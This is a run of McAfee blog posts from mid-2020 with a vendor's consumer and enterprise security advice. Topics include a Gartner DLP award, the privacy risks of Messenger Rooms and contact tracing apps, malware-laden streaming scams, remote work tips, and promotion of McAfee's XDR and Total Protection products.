The McAfee team is very proud to announce today that, for the second time in a row1, McAfee was named a Gartner Peer Insights Customers’ Choice for Enterprise Data Loss Prevention for its McAfee Data Loss Prevention Solution. We see the recognition as an historic landmark for McAfee because it represents a trifecta of Gartner distinction this year: we have now been named a 2020 Gartner Peer Insights Customers’ Choice for the three McAfee products that are integrated to make up the innovative cloud-native McAfee MVISION Unified Cloud platform: McAfee MVISION Cloud Access Security Broker, McAfee Secure Web Gateway, and McAfee Data Loss Prevention. McAfee Unified Cloud is a framework for implementing a Secure Access Service Edge (SASE) architecture and a safe way to accelerate digital transformation with cloud services, enable cloud and internet access from any device, and allow ultimate workforce productivity.


In its announcement, Gartner explains, “The Gartner Peer Insights Customers’ Choice is a recognition of vendors in this market by verified end-user professionals, taking into account both the number of reviews and the overall user ratings.” To ensure fair evaluation, Gartner maintains rigorous criteria for recognizing vendors with a high customer satisfaction rate.

For this distinction, a vendor must have a minimum of 50 published reviews with an average overall rating of 4.3 stars or higher. McAfee received 75 reviews and an overall 4.3 rating out of 5, as of 31 May 2020.

Here are some quotes from customers that contributed to this distinction:

“Great Product, Broad Protection, Easy to Use.”

“McAfee DLP offers broad coverage of protection. The product is easy to deploy and use. We have deployed the solution to 100K+ endpoint devices with minimum issues. DLP rules are easy to configure. Integration with other vendor products is smooth.”

Manager Cybersecurity, Security & Risk Management, in Transportation Industry: Read full review here

“Implementation Is Easy and It Provides Universal Data Protection Across Endpoints.”

“McAfee DLP is the best Data Loss Prevention tool. It has a lot of features to safeguard sensitive data. It has the ability to connect and synchronize on-premises DLP and cloud DLP policies with a single administrative portal, and lots of other features like integration with third-party tools for analytics, which helps InfoSec teams to safeguard the data and view the details of every endpoint.”

Programmer Analyst, Applications, Finance Industry: Read full review here

To learn more about this distinction, or to read the reviews written about our products by the IT professionals who use them, please visit Gartner Peer Insights’ Customers’ Choice announcement for Enterprise Data Loss Prevention. To all of our customers who submitted reviews, thank you! These reviews mold our products and our customer journey, and we look forward to building on the experience that earned us this distinction!

[1] McAfee was named a Gartner Peer Insights Customers’ Choice in 2018 and 2020; Gartner did not have one for the Enterprise DLP category in 2019.

The GARTNER PEER INSIGHTS CUSTOMERS’ CHOICE badge is a trademark and service mark of Gartner, Inc., and/or its affiliates, and is used herein with permission. All rights reserved. Gartner Peer Insights Customers’ Choice constitutes the subjective opinions of individual end-user reviews, ratings, and data applied against a documented methodology; it neither represents the views of, nor constitutes an endorsement by, Gartner or its affiliates.

Messenger Rooms: New Video Chat Option is Fun But Has Risks https://www.mcafee.com/blogs/consumer/family-safety/messenger-rooms-new-video-chat-option-is-fun-but-has-risks/ https://www.mcafee.com/blogs/consumer/family-safety/messenger-rooms-new-video-chat-option-is-fun-but-has-risks/#respond Sat, 04 Jul 2020 14:00:31 +0000 /blogs/?p=102508


The post Messenger Rooms: New Video Chat Option is Fun But Has Risks appeared first on McAfee Blogs.

One of the many things we’ve learned during this season of being homebound is that video chats with friends can save the day. One of the newest channels for video chatting is Messenger Rooms. While the new Facebook feature isn’t groundbreaking in terms of how it works, it’s the ability to pull together a big group of friends spontaneously that may make this a popular digital hangout for kids.

The Basics

Messenger Rooms functions similarly to the popular video conferencing app Zoom. The exception: There’s no need for users (or guests) to download a new app, create an account, or send out pre-planned meeting invites.

Messenger Rooms is simple. One person sets up a Messenger Room, that Room is assigned a URL, the organizer sends his or her friends that link, and those friends can instantly click it and be in the room. With so many families still opting to avoid large gatherings, Rooms may be the next best way to socialize in the most organic, pre-pandemic way.

The app makes it easy to watch movies together since one user screen can be pinned to the top of the chat for shared viewing. Kids can also have game nights, birthday parties, organize workout and study groups, or have a “squad hangout” as the Room title options call out (see graphic, below).

The Fun 

A few specific features may make Messenger Rooms appealing to kids. First, it’s easy to drop friends a link and be together almost instantly in a private room. Messenger Rooms is free, doesn’t have time limits, and up to 50 friends can get together in one room — from anywhere in the world. Kids joining a Room from their mobile app can apply quirky filters to their backgrounds or faces, which brings in the creativity element they get from Instagram Stories and Snapchat.

The Risks

Privacy. So far, privacy seems to be the biggest concern being raised and here’s why. Messenger Rooms, like Facebook, collects metadata from users — including guests without Facebook accounts. Metadata may include the people you talk with, at what times, and how often, all of which can be shared with a third party. Also, Messenger Rooms, while it does not record calls (like Zoom), lacks end-to-end encryption, which makes the channel vulnerable to hackers and compromises private conversations.

Troublemakers. Live chat rooms are not password-protected, so if a Room organizer decides to make a Room public or fails to lock a room they intended to be private, anyone can pop in and do anything. Much like the Zoom bombers emerging, anyone could crash a meeting with racial rants or graphic content. A link to a room can also be shared with others by anyone who has the link.

Cyberbullying. As with any app, conflicts can arise as can cyberbullying or harassment.

The Conversation

If you notice your kids using Messenger Rooms, you may consider having a few conversations that highlight the risks.

  • Privacy settings. If you organize a Room, lock it to keep unwanted people from crashing your meet up.
  • Nothing is private. Messenger Rooms isn’t encrypted, so it’s not the place to have private conversations or share sensitive content. Note: The internet in any form isn’t the place to share any personal content. Anything exchanged online — even a “private” text between two people — is vulnerable to hackers, device theft, or the possibility of a relationship falling out.
  • Nothing is free. Remind your children that services online are free for a reason. There is always an exchange: free use for data. Be aware that profile information and bits of a conversation could be mined and used by a third party. To understand better how data is collected, see Facebook’s help center or data policy.
  • Lock your room. Unless your child adjusts his or her preferences, a Room will be open to everyone that child is friends with on Facebook, and those friends will see the public Room at the top of their newsfeed. That means lovable Uncle Pete may mistakenly stumble into your daughter’s “squad” rant unless the Room is locked.
  • Report and block. If an unwanted person disrupts a Room, kids can block the user and report it to Facebook.
  • Age-appropriate options. For kids under 13 (Facebook age requirement), there’s Messenger Kids, a Facebook feature that allows younger kids to video call with friends in a parentally-supervised room. It’s a great tool for teaching kids safe, online practices before they use the real thing.

To stay ahead of the digital hangouts available to kids, visit McAfee Consumer Family Safety blogs each week. You may also consider monitoring your child’s devices with parental controls designed to filter content, monitor screen time, and track new apps.

How to Protect Your Privacy From Tracking Apps https://www.mcafee.com/blogs/consumer/consumer-threat-notices/how-to-protect-your-privacy-from-tracking-apps/ https://www.mcafee.com/blogs/consumer/consumer-threat-notices/how-to-protect-your-privacy-from-tracking-apps/#respond Thu, 02 Jul 2020 17:23:10 +0000 /blogs/?p=102379


The post How to Protect Your Privacy From Tracking Apps appeared first on McAfee Blogs.

Apps – what would life be without them? Imagine opening a brand-new browser tab every time you wanted to check your email, access photos, connect with friends on social media, or even pay your bills online.

Apps have greatly enhanced the way consumers interact with and complete tasks on their mobile devices. But what many consumers don’t realize is that they are tracked by many of the apps they know and use daily. Tracking can stem from a variety of platforms; however, one type in particular has brought this issue even more to the forefront: contact tracing apps, which can help slow the spread of COVID-19.

What Are Contact Tracing Apps?

According to MIT Technology Review, technologists have been working to build contact tracing apps and systems to identify and notify those who have come in contact with a virus carrier. Tech giants and public health authorities worldwide have quickly signed up to build the application programming interfaces (APIs) and apps necessary to support this project’s scale. However, many users are skeptical because they know very little about these apps, what data is collected, and who this data is shared with.

The success of these contact tracing apps rests on user participation. However, for these apps to make a real impact, developers must overcome potential privacy and security risks to assure individuals their data will only be used to fight the virus’ spread.

The Impact of Contact Tracing Technology

According to Health IT Security, the American Civil Liberties Union and the Electronic Frontier Foundation released reports outlining potential privacy and security risks developers should consider when building APIs and drafting privacy policies. Some of these risks include geo-location tracking or tracking a device’s location in real-time.

Then there’s user behavior to keep in mind. Some individuals may not understand the extent of the information they share with an app, while others are uneasy about the idea that the government – or a hacker – could easily access their whereabouts. What’s more, users are concerned that data collection will fail to end after the pandemic and authorities will use it in the future for unwarranted public surveillance.

While the privacy concerns around contact tracing apps are genuine, it’s also important to consider how this technology could greatly benefit public health. Although the privacy protection instilled in some apps is still a work-in-progress, some technologies have successfully contact traced without putting users’ privacy at risk. For example, Singapore’s app TraceTogether only collects and gathers data at the point that someone 1) is confirmed to have COVID-19 and 2) consents to the scraping of that data. From there, the data is anonymized, encrypted, and doesn’t reveal the identity of the infected user or the person that may have come in contact with them. What’s more, the data is deleted automatically after 21 days. By employing a thoughtful approach to contact tracing, positive strides can be made towards stopping the virus’s spread without risking user privacy.

How to Stay Secure

As a consumer living in a world riddled with uncertainty, you can take steps to help protect your digital life. When it comes to the rise of contact tracing technology and other apps you may use, here are some tips to consider to help safeguard your private information.

Understand and read the terms

Because this technology is relatively new, there is much to consider if you’re thinking about downloading a contact tracing app. Consumers can protect their privacy by reading the Privacy Policy and Terms of Service so they can know just what they’re dealing with.

Update your settings

If you’re concerned about an app having permission to access your location, photos, or other data, check your settings to see which apps have access to this information. Change permissions by either deleting the app or changing your settings on your device.

Consider other options

If you are not comfortable downloading a contact tracing app on your device but would like to be informed of the virus’ spread, you can visit the CDC’s website for COVID-19 cases, which can be narrowed down by state and county.

Stay Updated

To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

How to Keep Your Celebrations Happening – Virtually & Safely! https://www.mcafee.com/blogs/consumer/how-to-keep-your-celebrations-happening-virtually-safely/ https://www.mcafee.com/blogs/consumer/how-to-keep-your-celebrations-happening-virtually-safely/#respond Thu, 02 Jul 2020 01:38:16 +0000 /blogs/?p=102475


The post How to Keep Your Celebrations Happening – Virtually & Safely! appeared first on McAfee Blogs.

2020 has certainly been the year of the ‘new normal’. Our new life in which we stay home and socially distance has affected the way we work and learn but just as importantly, the way we celebrate!

Without a doubt, the video call saved the day while we all stayed home and socially distanced. Work meetings continued and learning at home still happened thanks to this wonderful technology. And while some people used video calls to remain in touch with family and friends, this remarkable technology also helped many people worldwide continue to celebrate life’s important milestones such as school and university graduations; weddings and, even the celebration of life at funerals.

Graduating Virtually

One of my oldest friends has two daughters who have just virtually graduated from their high school and university. Before each occasion, the girls were sent their cap and gown and their graduation certificates via the post. On the day of each event, the girls donned their specially purchased dresses – which were purchased long before ‘lockdown’ (along with their cap and gown) – and participated in the ceremony via video call. Dressed to the 9’s, their immediate family also watched the ceremony and witnessed their daughter (and sister) officially graduate.

While there wasn’t perhaps the same sense of camaraderie as if their cohort had graduated together in person, the video call was definitely the next best thing. It allowed them to see their friends, receive the public accolades they both so deserved and, most importantly, it provided a sense of completion and closure that allowed them to start thinking about their next phase in life.

Virtual Weddings

Within weeks of lockdown, the virtual wedding industry was well established. Companies such as Simply Eloped were offering virtual wedding packages that provided planning assistance, a virtual ceremony emcee, advice on acquiring a license and tech support. Specialised tech companies were also offering to coordinate weddings on video calling apps and manage guests on multiple devices.

And if you are getting married, of course you need photography so virtual photographers became a thing as did customised wedding backdrops providers and virtual live musicians to entertain your guests. If there was ever an example of an industry that mastered the art of pivoting, it was definitely the wedding industry!

Celebrating the End Of A Life – Virtually

Probably one of the hardest milestones to miss in person during lockdown was the celebration of life – the funeral. Around the world, many countries limited attendees at funerals to as low as 10 to ensure social distancing which meant live streaming the service became the next best option.

Specialised funeral live streaming companies such as OneRoom sprang up, allowing family and friends the opportunity for a private farewell even if they couldn’t attend in person. While a funeral service is an important way to remember and celebrate the life of the recently deceased, it is also an important part of the grieving process. I have several friends who lost treasured family members during the lockdown period who were very comforted by having the option to have a copy of the live-streamed service which they could watch several times.

If there’s ever a time to be grateful for the power of technology (and video calls) it’s now! I just can’t imagine how we have all survived the isolation without being able to stay in touch and see the faces of family and friends! But just like every aspect of online life, video calling apps are fantastic when used sensibly but they do also carry some risks. Here are my top tips to ensure that you can safely celebrate life’s milestones online:

  1. Don’t Share Links to Video Calls

Whether it’s a wedding ceremony, baby shower, meeting with a virtual photographer or a funeral service, sharing links to video calls means you are essentially extending the invitation to anyone who gets their hands on the link. Not only does this compromise the privacy of everyone involved, but video call ‘bombers’ have been known to use threatening and intimidating language which could be very unsettling.

  2. Keep Your Personal Meeting ID Tight!

Some video calling apps allocate each user a PMI or personal meeting ID. Your PMI is basically one continuous meeting, so anyone that has access to it can enter any of your future meetings or gatherings. Always generate a random meeting ID for any events where you don’t truly know your invitees.

  3. Video Calls Can Be Recorded

Don’t forget that video calls can be recorded. Even though a video call may feel like real life – it is not! So, if you are celebrating hard at your friend’s wedding, be mindful that your ‘high-energy’ behaviour may be recorded on camera!!

While ‘lockdown life’ may almost be over for some of us, many experts believe ‘social distancing’ will be a way of life for some time. So, if you have an important celebration on your radar, don’t despair – a well-planned virtual celebration can definitely be worthwhile and will be a great story to pass down to future generations!

Happy Virtual Celebrating!

Alex xx

Best Practices for Adapting to a Remote Work Lifestyle  https://www.mcafee.com/blogs/other-blogs/life-at-mcafee/best-practices-for-adapting-to-a-remote-work-lifestyle/ https://www.mcafee.com/blogs/other-blogs/life-at-mcafee/best-practices-for-adapting-to-a-remote-work-lifestyle/#respond Wed, 01 Jul 2020 22:36:20 +0000 /blogs/?p=102274


The post Best Practices for Adapting to a Remote Work Lifestyle  appeared first on McAfee Blogs.

As our world continues to evolve, we have been forced to adapt accordingly. Navigating change can be difficult for many, so here are useful tips McAfee team members have been using to improve productivity, stay healthy and help customers stay digitally secure during the pandemic. 

Productivity Hacks

Applying simple hacks to your routine and environment can help you stay productive. Create a workspace separate from your living space if you can. One tip is to get ready and get dressed as if you were going to the office. You’ll be prepared for that video conference when you feel put together. Recreating the “comforts of office” at home with accessories like a good mouse/keyboard set, external monitor, chair and even an office plant can go a long way. When you’re done for the day, close your laptop to reinforce the separation between work and your personal life. 

While some can seamlessly continue normal workday hours, many need to juggle between being a home school principal and master chef de cuisine before being able to look at emails. Try to find a balanced routine that works for your needs—and don’t be afraid to change it. 

Ways to Focus on Wellbeing and Stay Active at Home

Many athletic and health companies have brought their classes and routines online for free so people can stay active. The exercises range in intensity and function so you can easily find something that works for you. Whether you prefer a heart-racing, 20-minute HIIT cardio workout, or a decompressing 40-minute yoga session (or both, depending on what the day brings!), there are plenty of options for staying active indoors. These exercises can also be a family bonding activity to stay active together. Additionally, meditation apps have started offering free services to help improve mental wellbeing. 

Experimenting in the kitchen may also inspire some creative, healthy cooking. With many restaurants expanding to pickup and delivery models, now is a great time to support local businesses and to try that place you’ve previously set your sights on.

Be sure to stay in touch with your community, friends and family. Check up on others via text, call, or video to see how they’re doing and spend virtual time together. This applies equally to teammates. Encouraging remote lunches and social hours helps everyone stay connected and motivated. 

Tips for Staying Digitally Secure

As you’re spending more time online, and possibly seeing more devices connected to your network, it’s a good idea to re-evaluate your home’s digital privacy and security. For starters, consider strengthening your network and internet passwords. Talk to your kids about cybercrime to make sure they remember to practice digital hygiene as they connect online for classes and socialize with friends. 

As our external environment changes, so too does the digital threat landscape. When in doubt, connect to a VPN to help keep your personal data and financial transactions safe from prying eyes. Consider using a safe browser extension to help identify illegitimate websites, especially when shopping for supplies or staying up to date on the news. Pairing security tools with best practices can help keep you and your family safer online. 

Find Balance by Building in Hobbies

There is no shortage of indoor entertainment options, including video games, online board games and TV shows. Even some museums and zoos have made tours available online. Picking up a new hobby, book or new language could be a great way to keep your mind active. Above all, we encourage you to take care of yourself and your family. 

Building hobbies and leisurely activities into your daily routine can help bring structure to your routine. Here is how our team member, Lily, is finding balance while working to keep you safe online:

“Transitioning to working from home full-time has taught me the need to establish a routine and stick to it to ensure I’m exercising, setting work hours and taking breaks. Trying to establish a routine during the first couple of weeks was a challenge at first, but now I feel more balanced. Another good tip is to always keep healthy snacks and water at your work station!”

Want to work for a company that values employee wellbeing and helps you reach greater heights? Check out McAfee’s latest opportunities. 

Multi-Cloud Environment Challenges for Government Agencies https://www.mcafee.com/blogs/enterprise/cloud-security/multi-cloud-environment-challenges-for-government-agencies/ https://www.mcafee.com/blogs/enterprise/cloud-security/multi-cloud-environment-challenges-for-government-agencies/#respond Wed, 01 Jul 2020 15:00:05 +0000 /blogs/?p=102376


The post Multi-Cloud Environment Challenges for Government Agencies appeared first on McAfee Blogs.

Between January and April of this year, the government sector saw a 45% increase in enterprise cloud use, and as the work-from-home norm continues, socially distanced teamwork will require even more cloud-based collaboration services.

Hybrid and multi-cloud architectures can offer government agencies the flexibility, enhanced security and capacity needed to achieve what they need for modernizing now and into the future. Yet many questions remain surrounding the implementation of multi- and hybrid-cloud architectures. Adopting a cloud-smart approach across an agency’s infrastructure is a complex process with corresponding challenges for federal CISOs.

I recently had the opportunity to sit with several public and private sector leaders in cloud technology to discuss these issues at the Securing the Complex Ecosystem of Hybrid Cloud webinar, organized by the Center for Public Policy Innovation (CPPI) and Homeland Security Dialogue Forum (HSDF).

Everyone agreed that although the technological infrastructure supporting hybrid and multi-cloud environments has made significant advancements in recent years, there is still much work ahead to ensure government agencies are operating with advanced security.

There are three key concepts for federal CISOs to consider as they develop multi- and hybrid-cloud implementation strategies:

  1. There is no one-size-fits-all hybrid environment

Organizations have adopted various capabilities that have unique gaps that must be filled. A clear system for how organizations can successfully fill these gaps will take time to develop. That being said, there is no one-size-fits-all hybrid or multi-cloud environment technology for groups looking to implement a cloud approach across their infrastructure.

  2. Zero-trust will continue to evolve in terms of its definition

Zero-trust has been around for quite some time and will continue to grow in terms of its definition. In concept, zero-trust is an approach that requires an organization to complete a thorough inspection of its existing architecture. It is not one specific technology; it is a capability set that must be applied to all areas of an organization’s infrastructure to achieve a hybrid or multi-cloud environment.

  3. Strategies for data protection must have a cohesive enforcement policy

A consistent enforcement policy is key in maintaining an easily recognizable strategy for data protection and threat management. Conditional and contextual access to data is critical for organizations to fully accomplish cloud-based collaboration across teams.

Successful integration of a multi-cloud environment poses real challenges for all sectors, particularly for enterprises as large and complex as the federal government. Managing security across different cloud environments can be overwhelmingly complicated for IT staff, which is why they need tools that can automate their tasks and provide continued protection of sensitive information wherever it goes inside or outside the cloud.

At McAfee, we’ve been dedicating ourselves to solving these problems. We are excited that McAfee’s MVISION Cloud has been recognized as the first cloud access security broker (CASB) with FedRAMP High authorization. Additionally, we’ve been awarded an Other Transaction Authority by the Defense Innovation Unit to prototype a Secure Cloud Management Platform through McAfee’s MVISION Unified Cloud Edge (UCE) cybersecurity solution.

We look forward to engaging in more strategic discussions with our partners in the private and public sectors to not only discuss but also help solve the security challenges of federal cloud adoption.

How Entertaining Ourselves at Home Has Become a Risky Business https://www.mcafee.com/blogs/consumer/how-entertaining-ourselves-at-home-has-become-a-risky-business/ https://www.mcafee.com/blogs/consumer/how-entertaining-ourselves-at-home-has-become-a-risky-business/#respond Wed, 01 Jul 2020 05:56:06 +0000 /blogs/?p=102409


The post How Entertaining Ourselves at Home Has Become a Risky Business appeared first on McAfee Blogs.

Online entertainment is certainly having a moment. While we all stayed home and socially distanced, many of us filled our time binge-watching movies and TV series  – and wasn’t it fabulous!! But did you know that researching your next binge-watching project could actually be putting you at risk?

Aussies Love TV

There is no doubt that we Aussies love our TV, and the statistics confirm this. With over three-quarters of Aussies watching TV and over two-thirds browsing the internet to pass the time during lockdown, we are clearly a country of screen-time professionals. And with just under a million new Aussies gaining access to a streaming service in their household, it seems everyone is doing their bit to support the entertainment industry!

But streaming isn’t cheap and can add up fast (particularly when you have multiple accounts) prompting many of us to look for free alternatives. And our desire to save a buck or two when trying to find our next binge-watching project hasn’t escaped the attention of cybercriminals who have a knack for crafting convincing scam strategies that are in sync with consumer trends.

What’s the Most Targeted Show to Search For?

McAfee analysed over 100 of the top ‘talked about’ entertainment titles available across the leading streaming providers here in Australia and identified the 10 most targeted shows (both TV and film) to search for.

The series Unorthodox and the movie Ace Ventura took the top place in their respective categories as having the highest ‘web search risk’, which means cybercriminals have put a lot of effort into developing scams around these titles. Scams could include websites offering free downloads of these titles – which require you to enter your personal information – or pirated videos that contain malware which could access the private data on your device.

Here are the top 10 riskiest shows in both categories:

Series – Australian Top 10 Most Targeted

  1. Unorthodox
  2. You
  3. Family Guy
  4. Big Mouth
  5. Homeland
  6. The Vampire Diaries
  7. Dynasty
  8. Lost
  9. Brooklyn Nine-Nine
  10. Stranger Things

Movies – Australian Top 10 Most Targeted

  1. Ace Ventura
  2. Green Book
  3. John Wick
  4. Machinist
  5. Annihilation
  6. Ex Machina
  7. A Star Is Born
  8. Fyre
  9. Lady Macbeth
  10. Bird Box

Horror and Thriller Films seem to be the trend!

It appears as though our love for horror and thriller films may be putting us in danger, with five of the top ten films most targeted by cybercriminals falling into these genres. With social distancing restrictions in place, Aussies are clearly seeking to add some thrill back into their lives which has opened up new opportunities for cybercriminals. Consumers need to be careful when it comes to searching for stimulating content to escape reality to ensure it doesn’t translate to real-life malware horror.

How You Can Stay Safe While Binge-Watching At Home

Now, I want to make it very clear – this news doesn’t mean you need to give up nights on the couch. Not at all! Instead, just follow a few simple steps and you can continue binge-watching to your heart’s content!

Here are my top tips for staying safe:

  1. Be Careful What You Click – if you are looking to catch up on the latest season of You or A Star is Born, please only access entertainment content directly from a reliable source. The safest thing to do is to subscribe to a streaming site that offers the content or download the movie from sources like iTunes or Amazon, instead of downloading a “free” version from a website that could contain malware.
  2. Do NOT use Illegal Streaming Sites – this is not negotiable! Many illegal streaming sites are riddled with malware disguised as pirated video files. Malware could cause you a world of pain. Not only could it cause your device to freeze or crash, it could steal sensitive information and give cybercrims unauthorized access to system resources. So, do your device a favor and stream your favourite show from a reputable source.
  3. Protect your Online Life with a Cybersecurity Solution – why not send your regards to malicious actors with a comprehensive security solution like McAfee Total Protection. This can help protect you from malware, phishing attacks, and other threats. It also includes McAfee WebAdvisor, which helps alert users of malicious websites.

So, when you are looking for your next binge-watching project, please take a moment before you download. Ensure the site you are accessing content from is legit (have you heard of it before? is it offering something for free when every other streaming service has a fee?) and if you are even a little unsure that it doesn’t look professional then DON’T click! The last thing you want is a bonus virus to interrupt your night in on the couch!

Happy Watching!!

Alex xx
The post How Entertaining Ourselves at Home Has Become a Risky Business appeared first on McAfee Blogs.

Why Should You Pay for a Security Solution? https://www.mcafee.com/blogs/consumer/why-should-you-pay-for-a-security-solution/ https://www.mcafee.com/blogs/consumer/why-should-you-pay-for-a-security-solution/#comments Tue, 30 Jun 2020 22:39:50 +0000 /blogs/?p=102367

Do you ever go a single day without using a digital device? The answer is probably not. According to the Digital 2019 report by Hootsuite and We Are Social, users spend almost 7 hours a day online. And due to the recent stay-at-home orders, that number has only increased (internet hits recently surged between 50% to 70%). What’s more, U.S. households are now estimated to have an average of 11 connected devices – that’s almost 3 devices per person in my family!

As the use of devices, apps, and online services increases daily, so does the number of online threats consumers face. That’s why it is important that users consider what the best method is for securing their digital life.

My advice? Use a comprehensive security solution (and I’m not only saying this because I work for McAfee). Here’s why.

The Limitations of Free Security Tools

Let’s be real – we all love free stuff (Costco samples anyone?). However, when it comes to my family’s security, am I willing to risk their safety due to the limitations of free solutions?  

Free tools simply don’t offer the level of advanced protection that modern technology users need. Today’s users require solutions that are as sophisticated as the threats they face, including everything from new strains of malware to hacking-based attacks. Free tools also quite literally limit consumers’ online activity, as many impose limits on which browser or email program the user can leverage, which can be inconvenient as many already have a preferred browser or email platform (I know I do).

Free security solutions also carry in-app advertising for premium products or, more importantly, may try to sell user data. Also, by advertising premium products, the vendor indirectly admits that a free solution doesn’t provide enough security. These tools also offer little to no customer support, leaving users to handle any technical difficulties on their own. What’s more, most free security solutions are meant for use on only one device, whereas the average consumer owns over three connected devices.

Security should provide a forcefield that covers users in every sense of the word – the devices they use, where they go online, how they manage and store information, and their personal data itself.

Connected Consumers Need Comprehensive Solutions

Today’s users need more than just free tools to live their desired digital life. To truly protect consumers from the evolving threat landscape, a security solution must be comprehensive. This means covering not only the user’s computers and devices, but also their connections and online behaviors. Because today’s users are so reliant on their devices and connections to bridge the gap between themselves and the outside world, security solutions must work seamlessly to shield their online activity – so seamlessly that they almost forget the solution is there. This provides the user with the protection they need without the added distractions of in-app advertising or the constant worry that their subpar solution might not secure them from common online threats.  

Why McAfee Matters

Free security products might provide the basics, but a comprehensive solution can protect the user from a host of other risks that could get in the way of living their life to the fullest. McAfee knows that users want to live their digital lives free from worry. That’s why we’ve created a line of products to help consumers do just that. With McAfee® Total Protection, users can enjoy robust security software with a comprehensive, yet holistic approach to protection.  

First, consumers are safeguarded from malware with cloud-based threat protection that uses behavioral algorithms to detect new threats – specifically protecting the device and web browsing. The software’s detection capabilities are constantly being updated and enhanced, without compromising the performance of users’ devices.  

McAfee also provides users with protection while surfing the web, where they can face a minefield of malicious ads or fraudulent websites. These pesky threats are designed to download malware and steal private information. That’s why McAfee® LiveSafe and McAfee® Total Protection include McAfee® WebAdvisor – web protection that enables users to sidestep attacks before they happen with clear warnings of risky websites, links, and files. They also include McAfee® Identity Theft Protection, which helps users stay ahead of fraud with Dark Web monitoring and SSN Trace to see if personal information has been put at risk.

Finally, we can’t forget about the importance of mobile threat detection, given that consumers spend nearly half of their online time via their mobile devices. Hackers are fully aware that we live in a mobile world, and they’ve stepped up mobile attacks accordingly. That’s why McAfee solutions provide multi-device protection so you can safely connect while on the go.

With robust, comprehensive security in place, your family’s devices will be consistently protected from the latest threats in the ever-evolving security landscape. With all these devices safe, everyone’s online life is free from worry.

Stay Updated

To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Why Should You Pay for a Security Solution? appeared first on McAfee Blogs.

McAfee XDR: Taking Threat Detection and Response to a New Level https://www.mcafee.com/blogs/enterprise/endpoint-security/mcafee-xdr-taking-threat-detection-and-response-to-a-new-level/ https://www.mcafee.com/blogs/enterprise/endpoint-security/mcafee-xdr-taking-threat-detection-and-response-to-a-new-level/#respond Mon, 29 Jun 2020 21:43:52 +0000 /blogs/?p=102286

In the battle to protect digital data, the stakes have never been higher, and the outcome has never been more uncertain.

Enterprises face ever-changing threats to their digital assets both inside and outside the traditional network perimeter from sophisticated threat actors, who use a changing assortment of techniques to find ways to skirt traditional security controls.

It’s also increasingly difficult for SOC teams to stay ahead of the attackers. Too often, they rely on an assortment of disconnected security tools and data sets supplied by different vendors. This is a flawed approach that requires multiple tools and consoles, driving up cost and the resources to make sense of the sea of data, leaving organizations with less visibility and manageability.

Many organizations still rely on EDR systems to get information about attacks against their endpoints that may be undetected or unclassified by traditional EPP solutions. However, enterprises nowadays require an extended protective umbrella that can defend not just legacy endpoints, but also mobile, and cloud workloads – all without overburdening in-house staff or requiring even more resources. Detecting today’s advanced threats requires more than a collection of point solutions. SOCs need a platform that intelligently reveals advanced adversaries leading to better, faster security outcomes.

The Rise of XDR

Companies simply can’t afford not to have full visibility into who’s trying to attack them. Here is where the deployment of Extended Detection and Response (XDR) can have a powerful security impact. XDR isn’t a single product. Rather, it refers to an assembly of multiple security products (and services) that comprise a unified platform.

Gartner defines XDR as a SaaS-based, security threat detection and incident response tool that natively integrates different security products into a cohesive security operations system. That’s a mouthful, but in practice, XDR makes the job of defenders easier by delivering a full complement of security capacities – everything from asset discovery and threat detection to vulnerability assessment, investigation and response. We see how detection efficacy drops when multiple platforms and consoles are required to identify and remediate threats. But with XDR, defenders have a single pane view into their environment across different platforms, both on-prem as well as in the cloud.

It also changes the nature of threat-hunting. Consider an organization that’s using a SIEM. While the system collects information in batches – typically from non-endpoint data sources and security countermeasures – that isn’t the same as delivering real-time results. Even if SOC teams try to get faster answers by stitching together custom tools to correlate data, they still lag behind the attackers.

By contrast, an XDR platform will offer access in real time to all necessary telemetry to conduct a hunt and retrieve results in seconds. That helps defenders streamline the process of triage and investigation and unlock insights that were previously unimaginable using previous security tools.

Making a Difference

XDR is not a bullet-point discussion. We’re talking about different needs, delivered in different ways, and for different customers and leveraging a unique set of multi-vendor sensors and countermeasures for each.

This is where a trusted partner with a broad portfolio makes all the difference in that customer journey. As cybercriminals and groups acting on behalf of nation-states step up their nefarious activities, the outcome of this struggle against bad actors turns on speed, reliability, and predictable security outcomes.

An innovator in this field, McAfee is particularly suited to help customers to meet that challenge with a sophisticated intelligence-driven security platform. As Gartner noted earlier this year in a wide-ranging report on XDR, McAfee’s approach leverages a deep technological understanding of the relationships in the underlying data to help speed rapid out-of-the box integration.

McAfee’s XDR also benefits from a rich security legacy and a deep product portfolio. We’re also uniquely equipped to provide actionable intelligence on security threats because we can access over one billion global sensors across devices, networks and in the cloud.

The mobilization of that full complement of security capabilities delivers more complete threat detection, investigation, and response than any other security provider. For instance, when enterprises implement the security products that comprise McAfee’s XDR solution, they also benefit from the following:

  • AI and Expert System Security Analytics
  • A single interface for detections at the endpoint, sandbox, network, Internet perimeter/edge/gateway, and cloud
  • Accurate threat prioritization that helps predict potential impact as well as any countermeasures to foil an attack – the only solution that does this in a concurrent manner
  • Combined threat and detection data from your environment for richer, more meaningful alerts as well as prescriptive configuration suggestions to improve protection efficiency
  • More context and intelligent correlation leading to faster detection and higher fidelity alerts

The upshot is that McAfee XDR dramatically reduces the time defenders need to detect, contain, and respond to threats. Our AI and Big Data analytics capabilities supply SOCs with threat and campaign insights before an attack changes course, so they avoid wasting time chasing false positives. Defenders get fewer and more meaningful alerts, making it easier to prioritize their response based on the severity and potential impact of a threat.

In a nutshell: McAfee XDR delivers a complete platform that gives SOCs visibility into how threats are impacting your key business processes, prioritizes response, and provides a fully integrated platform of security technologies.

While it may still not be ready for prime time, XDR is poised to become an important part of the unfolding security story this year and beyond as more enterprises move their information to the cloud. It’s also why having an experienced partner by your side to help unlock the full benefits of a cohesive, unified security incident detection and response platform has never been more important.

For more information visit: mcafee.com/XDR

The post McAfee XDR: Taking Threat Detection and Response to a New Level appeared first on McAfee Blogs.

Meaningful Context for Your Endpoint Threat Investigations https://www.mcafee.com/blogs/enterprise/endpoint-security/meaningful-context-for-your-endpoint-threat-investigations/ https://www.mcafee.com/blogs/enterprise/endpoint-security/meaningful-context-for-your-endpoint-threat-investigations/#respond Mon, 29 Jun 2020 18:16:04 +0000 /blogs/?p=102262

